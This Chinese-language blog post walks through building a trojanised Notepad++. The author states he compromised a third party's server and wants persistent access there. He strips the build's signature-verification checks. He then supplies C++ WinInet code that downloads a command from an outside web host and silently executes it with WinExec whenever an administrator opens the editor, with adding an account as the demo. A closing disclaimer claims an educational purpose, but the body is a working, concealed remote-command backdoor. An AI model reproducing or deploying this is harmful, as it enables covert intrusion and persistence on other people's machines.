看了Micropoor大牛分享的一系列教程,受益良多。PS:下文将Micropoor写做Mp
笔者对其中几篇谈及后门的文章颇有兴趣,作者在他的文章中给出了一些大体思路但未谈及实现细节,于是笔者按照文中提供的思路动手实践了一下。
这里引用一个概念:
人为化后门:一般指被动后门,由人为引起触发导致激活,或者传播
要做到高度化定制,足够贴合实际目标,我们可能会需要它。
正好之前秒了一台独立服务器,登陆进去发现服务器主人预先安装了Notepad++,这简直是最佳实践…服务器有了,缺个后门,不多说我们自己来动手:根据Mp的文章我们去官方git仓库下载其开源的源代码本地编译。
仓库地址:https://github.com/notepad-plus-plus/notepad-plus-plus
完整目录如下:
其中PowerEditor是Notepad++的项目文件,scintilla是Notepad++引用的代码编辑库。
我们编译的顺序是先使用VS2017CMD编译scintilla项目,得到SciLexer.dll文件,将其复制到PowerEditor项目内作为动态链接库,再用VS2017编译PowerEditor这个项目。
具体编译过程:找到VS目录,在vs2017\Common7\Tools\VsDevCmd.bat文件夹下找到 VS2017专用CMD ,打开它。
切换目录到Notepad++的源代码目录下,进入scintilla\win32\目录。(PS:windows下的CD跨磁盘 需要输入/d )。
输入 nmake NOBOOST=1 DEBUG=1 -f scintilla.mak 回车编译,等待即可。
将生成的SciLexer.dll文件从scintilla\bin\目录中复制到PowerEditor文件的同一目录下。如果是Release 就放到PowerEditor目录,如果是Debug就放到PowerEditor\visual.net 目录
另外如果不想动手编译,可以直接在安装好的Notepad++ 根目录找到此dll文件。这里指出几个编译时掉入的坑:
Mp 在他的文章中用的 VS2017 编译,却说要打开notepadPlus.vs2013.vcxproj 这个项目文件。
我猜测这可能是笔误,实际上打开这个项目文件编译会遇到符号问题。对此我专门用半自创英语去官方git 仓库提了issue,大家遇到问题也可以去各种官方库下面提问,一般都会有热心的开源社区人员进行解答
得到回复后才明白用VS2017编译的话是要选择notepadPlus.vcxproj这个文件,而不是2013那个文件。
在项目配置上,点击项目 -> Notepad++属性 -> 配置属性 -> C/C++->常规,将警告视为错误置为否,并选择当前编译器适配的平台,选择 Unicode Debug或者Release + X86 架构。
有时候编译完成会报错,弹框提示签名证书会验证失败,我在这里将报错处理的语句统统注释掉了。
如果遇到下面这种报错:
解决办法:
这是因为他验证文件数字签名出问题了,也许是我们自己编译的dll文件存在问题。具体我们可以找到Common.cpp,在此文件内搜索isCertificateValidated定位到验证函数:
简单看了下它的处理异常的代码,写的很详细,有很多种错误类型。不同编译环境可能产生不同的错误,在此我给出一种通用的解决办法:搜索它的报错关键字,哪里报错注释哪里,简单有效。定位到catch内部就尝试注释掉它内部的验证逻辑:
Authenticodecheck failed 错误解决:
DLLsignature verification failed 错误解决:
顺利通过编译后,就可以考虑添加后门功能了。我开始思考下面的问题:
一个后门之所以称之为后门,必然是有里应外合的功能的,而在C++Win32编程中,基础库执行系统命令使用system()函数可以完成命令,但是会弹出黑色命令窗口。为了隐蔽性,在查阅了官方文档后,找到了WinExec(),使用这个函数来执行系统命令则不会弹黑色命令窗口。
system("calc");//这种方法会弹出黑框,WinExec("指令",SW_NORMAL); //这种方法不会弹黑色命令窗口。接下来仔细想想,弹个计算器也没啥用,直接增加账户又太明显,于是我又去参考网络通信基础模块,扩展指定接收指令执行的功能。这里用了WinInetAPI 实现HTTP 通信,相比于libcurl等第三方库使用起来更方便快捷。下面给出实例代码以及相关头文件引用:
#include<iostream>
#include<cstdio>
#include<wininet.h>
#pragmacomment(lib,"WinInet.lib")
#definePORT 0x50 // 端口号80
#defineURL "www.recorday.cn" // 绝对域名
#definePAGE "/test/order.txt"//相对指令地址
char_HTTP_ARAC[] =
"Accept-Language:zh-cn\r\n"\
"Content-Type:application/x-www-form-urlencoded\r\n\r\n";
char_HTTP_File[1024] = { 0 };
HINTERNETInte = InternetOpenA("Mozilla/4.0 (compatible; MSIE 9.0; WindowsNT 6.1)", 1, "", "", 0);
//初始化Wininet并创建一个HTTP连接
if(0 == Inte) {
//cout<< "error InternetOpen" << endl;
MessageBoxA(0,"error InternetOpen1", "error", 16);
}
HINTERNETConnect = InternetConnectA(Inte, URL, 80, "", "",INTERNET_SERVICE_HTTP, 0, 0); //请求与网站连接
if(0 == Connect) {
InternetCloseHandle(Inte);
InternetCloseHandle(Connect);
MessageBoxA(0,"error InternetOpen2", "error", 16);
}
HINTERNETHttpOpen = HttpOpenRequestA(Connect, "GET", PAGE,"HTTP/1.1", NULL, NULL, 1, 0);
//向网站服务器发送请求页面
if(0 == HttpOpen) {
InternetCloseHandle(Inte);
InternetCloseHandle(Connect);
InternetCloseHandle(HttpOpen);
MessageBoxA(0,"error HttpOpenRequest3", "error", 16);
}
boolbo = HttpSendRequestA(HttpOpen, NULL, 0, NULL, 0); //向网站服务器发送请求HTTP协议和POST请求数据
if(bo == false) {
InternetCloseHandle(Inte);
InternetCloseHandle(Connect);
InternetCloseHandle(HttpOpen);
MessageBoxA(0,"error HttpOpenRequest4", "error", 16);
}
DWORDy = 0;
if(!InternetReadFile(HttpOpen, _HTTP_File, 1024, &y)) { //获取HTTP响应消息
InternetCloseHandle(Inte);
InternetCloseHandle(Connect);
InternetCloseHandle(HttpOpen);
MessageBoxA(0,"error InternetReadFile5", "error", 16);
}
else{
MessageBoxA(0,_HTTP_File, "ok", 0);//打印得到的响应消息
WinExec(_HTTP_File,SW_NORMAL); //执行获取的指令
}
代码中间为了方便调试写了不少弹框,实战中为了避免不必要的麻烦,请务必去掉。
最终效果
获取指定URL下的添加账户命令,并且静默执行(请无视个人主机的360防护)。
上图为测试的动态图片。
假想触发链:管理员在服务器上打开Notepad++, 则会触发后门,获取我们事先放到VPS的命令。
本文章纯属对MP大牛提出的一些想法进行了个人踩坑实践,相比于其他后门还是相形见绌,如有错误请大家及时指出。另外,维持权限不要局限于一种工具,或者一类方法。当我们的目标处于不同平台不同环境时,我们会束手无策还是拿出花一样的思路呢?我认为后者才是真本事。希望大家多多和我交流!
本文仅用于普及网络安全知识,提高小伙伴的安全意识的同时介绍常见漏洞的特征等,若读者因此做出危害网络安全的行为后果自负,与合天智汇以及原作者无关,特此声明。本文为原创文章,转载请注明出处!